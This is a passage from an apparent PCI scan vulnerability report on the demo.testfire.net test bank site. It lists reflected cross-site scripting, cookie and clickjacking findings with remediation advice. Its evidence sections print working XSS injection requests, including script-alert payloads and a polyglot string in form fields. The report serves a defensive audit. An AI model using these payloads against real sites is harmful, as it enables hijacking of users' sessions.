All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 488 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650660.00947)</script>
Detection: An alert was detected containing 15650660.00947
Request: GET
http://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: http://demo.testfire.net/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 489 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

162 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net/sendFeedback


Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 490 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net/sendFeedback - name
Injection: <script>alert(15650660.00557)</script>
Detection: An alert was detected containing 15650660.00557

Request: POST http://demo.testfire.net/sendFeedback HTTP/1.1


Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650660.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 491 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
list, and other XSS vulnerabilities may exist in the application.

163 Insecure configuration of 4.3 Medium Fail URL: http://65.61.137.117/


Cookie attributes Port: tcp/80

A Cookie Vulnerability helps an attacker to gain access to session


information stored in cookies. It may also be used as a 'locator' attack
that precedes a Cross-Site Scripting (XSS) or Man-In-The-Middle attack.
When looking for Cookie Vulnerabilities, an attacker will first observe
cookies through various HTTP proxies and check their attributes. The
attacker will then try to steal cookies of various users by employing
multiple attacks. If successful, he/she may be able to get sensitive
information which can be further used in an illegitimate way.

CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29

Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 7dea7694e36255c4c48824f9a0de4e13
Path = /
Host = 65.61.137.117
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 492 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Secure flag must be set for Session Cookies for Application served over
SSL.
For all Session cookies, HTTPOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper Caching headers should be
set for responses carrying the cookie.

164 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net:8443/sendFeedback


Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 493 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net:8443/sendFeedback - name
Injection: <script>alert(15650661.00557)</script>
Detection: An alert was detected containing 15650661.00557

Request: POST https://demo.testfire.net:8443/sendFeedback HTTP/1.1


Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650661.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 494 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

165 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net/util/serverStatusCheckService.jsp?Ho


stName=%3Cscript%3Ealert%2815650658.00947%29%3C%2F
script%3E
Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 495 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650658.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650658.00947)</script>
Detection: An alert was detected containing 15650658.00947
Request: GET
https://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650658.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: https://demo.testfire.net/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 496 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

166 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117/sendFeedback


Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 497 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117/sendFeedback - name
Injection: <script>alert(15650642.00557)</script>
Detection: An alert was detected containing 15650642.00557

Request: POST https://65.61.137.117/sendFeedback HTTP/1.1


Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650642.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 498 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

167 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117/util/serverStatusCheckService.jsp?HostN


ame=%3Cscript%3Ealert%2815650642.00947%29%3C%2Fscr
ipt%3E
Port: tcp/443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 499 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cross-site scripting can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%
3Cscript%3Ealert%2815650642.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650642.00947)</script>
Detection: An alert was detected containing 15650642.00947
Request: GET
https://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%
3Cscript%3Ealert%2815650642.00947%29%3C%2Fscript%3E HTTP/1.1
Referer: https://65.61.137.117/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 500 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

168 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117/sendFeedback


Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 501 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650656.00617)//>*/alert(15650656.00617)/*
Detection: An alert was detected containing 15650656.00617

Request: POST http://65.61.137.117/sendFeedback HTTP/1.1


Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 502 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00617%29%2F%
2F%3E*%2Falert%2815650656.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

169 No Clickjacking Protection 2.6 Low Pass URL: http://65.61.137.117:8080/


present Port: tcp/8080

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 503 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=D5CC99799F62567D97687377E9E57D1E;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:05:09 GMT"]}
url: http://65.61.137.117:8080/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.

170 No Clickjacking Protection 2.6 Low Pass URL: http://demo.testfire.net:8080/


present Port: tcp/8080

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 504 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=7396ECE6F9230BEA6656EC9364C1EEE4;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:04:14 GMT"]}
url: http://demo.testfire.net:8080/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.

171 No Clickjacking Protection 2.6 Low Pass URL: https://demo.testfire.net:8443/


present Port: tcp/8443

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 505 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=6AD1B35870824ABE33FC4A206303ADA1;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:06:04 GMT"]}
url: https://demo.testfire.net:8443/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.

172 No Clickjacking Protection 2.6 Low Pass URL: https://65.61.137.117:8443/


present Port: tcp/8443

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 506 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=5E429D789B42131617FC21FC2C7092B0;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:06:59 GMT"]}
url: https://65.61.137.117:8443/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.

173 No Clickjacking Protection 2.6 Low Pass URL: https://65.61.137.117/


present Port: tcp/443

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 507 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=91AE2C06F7F66EB7AC4721CA7926E84A;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:03:20 GMT"]}
url: https://65.61.137.117/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
